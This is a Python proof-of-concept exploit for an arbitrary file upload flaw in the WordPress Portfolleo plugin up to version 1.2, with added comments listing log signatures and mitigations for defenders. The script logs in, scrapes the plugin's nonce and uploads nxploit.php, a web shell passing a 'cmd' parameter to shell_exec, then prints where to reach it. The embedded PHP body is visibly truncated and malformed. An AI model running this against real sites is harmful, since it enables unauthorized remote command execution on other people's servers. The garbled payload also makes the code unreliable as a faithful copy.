# Proof-of-concept client for the issue named in the argparse description
# below: "WordPress Portfolleo plugin <= 1.2 - Arbitrary File Upload".
#
# What the script does, in order:
#   1. logs in through wp-login.php with credentials given on the command line;
#   2. reads the `_wpnonce` hidden field from the plugin's admin page
#      (wp-admin/admin.php?page=portfolleo);
#   3. sends a multipart POST to wp-admin/options.php whose `fileupload` part
#      is named nxploit.php;
#   4. prints the location where it expects that file to be reachable
#      (wp-content/portfolleo/nxploit.php).
#
# Traces a defender can look for, all taken from the requests built below:
#   - POST /wp-admin/options.php with a multipart `fileupload` part whose
#     filename ends in .php and a `page_options=name,dob,desc,datafile` field;
#   - the fixed form values 'dob': '23/03/2025' and the `desc` text;
#   - the bare "Mozilla/5.0" User-Agent on every request;
#   - .php files appearing under wp-content/portfolleo/, and later requests
#     to them carrying a `cmd` query parameter.
#
# Mitigation (general practice, not stated on this page): remove the plugin or
# move past version 1.2 once a fixed release exists, deny PHP execution in
# directories that receive uploads, and limit which accounts can reach the
# plugin's admin page.
import requests
import time
import argparse
from bs4 import BeautifulSoup

# Banner (reproduced exactly as it appears on the page; the original line
# breaks of the ASCII art are not recoverable from this copy).
banner = """ @@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@ @@@@@@@@ @@@@@@ @@@ @@@ @@@@@@ @@@@@@ @@@@@@@ @@@@@@ @@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@@@ @@@@ @@@@ @@@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ !@@ @@! @@@ @@! @@@ @@! @@@@ @@@ @@!@! @@!@! @@! @@@ !@@ !@@ @@@ !@! !@! @!@ !@! @!@ !@! @!@!@ @!@ !@!!@! !@!!@! !@! @!@ !@! !@! @!@ !@! @!@ !@! @!!!:! @!@!@!@!@ !!@ @!@ @! !@! !!@ @!! @!! @!@!@!@!@ @!! @!! !!@!!@!! !!@@!@! !!@@!! @!@!!@ !!! !@! !!! !!!!!: !!!@!@!!! !!: !@!!! !!! !!: !!! !@! !!!@!@!!! !!! !@! !!@!!! @!!@!!!! @!!@!!! !!@!@! :!! :!: !!: !!: !:! !!:! !!! !:! :!!:!:!!: :!!:!:!!: !!! !:! !:! !:! !!: :!: ::!!:! :!: :!: :!: !:! :!: !:::!!::: !:::!!::: !:! :!: !:! !:! :!: ::: ::: :::: :: :::: :: ::::: ::::::: :: :: ::::: ::: ::: ::::: :: :::: ::: :::: :: :: :::: :: :: : : : :: :: :: : ::: : : : : :: : ::: ::: ::: : : : :: : : :: : : : : : By:Nxploited | Khaled Alenazi, """
print(banner)


def _browser_headers():
    """Return the request headers every call in this script sends."""
    return {"User-Agent": "Mozilla/5.0"}


def parse_arguments():
    """Parse the command line: base URL, WordPress username and password.

    All three options are required; argparse exits with a usage message when
    one is missing.
    """
    cli = argparse.ArgumentParser(
        description="WordPress Portfolleo plugin <= 1.2 - Arbitrary File Upload vulnerability # by Khaled Alenazi"
    )
    cli.add_argument(
        '-u', '--url',
        required=True,
        help='Base URL of the site (e.g. http://192.168.100.74:888/wordpress)',
    )
    cli.add_argument(
        '-U', '--username',
        dest='username',
        required=True,
        help='WordPress username',
    )
    cli.add_argument(
        '-p', '--password',
        required=True,
        help='WordPress password',
    )
    return cli.parse_args()


def create_session():
    """Build the requests.Session shared by every later request.

    Certificate verification is switched off and the resulting urllib3
    warnings are silenced, so the WordPress password posted by login() is sent
    to whichever host answers at the URL without its identity being checked.
    """
    requests.packages.urllib3.disable_warnings()
    http = requests.Session()
    http.verify = False
    return http


def login(session, url, username, password):
    """POST the WordPress login form at ``{url}/wp-login.php``.

    Returns the raw response. Success is not judged here; check_login()
    inspects the session cookies afterwards.
    """
    credentials = {
        'log': username,
        'pwd': password,
        'rememberme': 'forever',
        'wp-submit': 'Log In',
    }
    return session.post(
        f"{url}/wp-login.php",
        data=credentials,
        headers=_browser_headers(),
    )


def check_login(session):
    """Return True when any session cookie name contains 'wordpress_logged_in'."""
    for jar_entry in session.cookies:
        if 'wordpress_logged_in' in jar_entry.name:
            return True
    return False


def get_nonce(session, url, portfolio_path):
    """Fetch ``{url}/{portfolio_path}`` and return its ``_wpnonce`` field value.

    The first ``<input name="_wpnonce">`` on the page is used. If the page has
    no such input, ``find`` returns None and the subscript raises TypeError;
    nothing here handles that case.
    """
    page = session.get(f"{url}/{portfolio_path}", headers=_browser_headers())
    document = BeautifulSoup(page.text, 'html.parser')
    nonce_field = document.find('input', {'name': '_wpnonce'})
    return nonce_field['value']


def upload_shell(session, url, nonce, portfolio_path):
    """Send the multipart form carrying the .php file to ``wp-admin/options.php``.

    The request pairs a valid ``_wpnonce`` with a ``fileupload`` part named
    nxploit.php and declared as application/x-php. The script relies on the
    server storing that part under its original name and extension, which is
    the behaviour an upload handler should refuse (allow-list extensions,
    store outside the web root or without execute rights).

    Returns the raw response; the caller does not inspect it.
    """
    # File body reproduced exactly as it appears on the page.
    upload_part = {
        'fileupload': (
            'nxploit.php',
            '" . shell_exec($_GET["cmd"]) . ""; ?>',
            'application/x-php',
        )
    }
    # Fixed field values: useful as request signatures when reviewing logs.
    fields = {
        '_wpnonce': nonce,
        '_wp_http_referer': f'/{portfolio_path}',
        'name': 'profile',
        'dob': '23/03/2025',
        'desc': 'Im Nxploited , Khaled Alenazi',
        'action': 'update',
        'page_options': 'name,dob,desc,datafile',
        'submit': 'Add To Portfolio',
    }
    return session.post(
        f"{url}/wp-admin/options.php",
        headers=_browser_headers(),
        files=upload_part,
        data=fields,
    )


def main():
    """Run the login, nonce read and upload steps in sequence.

    Exits after the failure message when no logged-in cookie is present.
    The "Shell has been uploaded." line is printed unconditionally: the upload
    response is never checked, so that message alone is not evidence that a
    file was written on the server.
    """
    args = parse_arguments()
    session = create_session()

    login(session, args.url, args.username, args.password)
    if not check_login(session):
        print("[-] Failed to log in.")
        exit()
    print("[+] Logged in successfully.")

    portfolio_path = "wp-admin/admin.php?page=portfolleo"
    nonce = get_nonce(session, args.url, portfolio_path)
    print(f"[+] Extracted _wpnonce: {nonce}")

    upload_shell(session, args.url, nonce, portfolio_path)
    print("[+] Shell has been uploaded.")
    print("[*] Check the shell here: {}/wp-content/portfolleo/nxploit.php".format(args.url))


if __name__ == "__main__":
    main()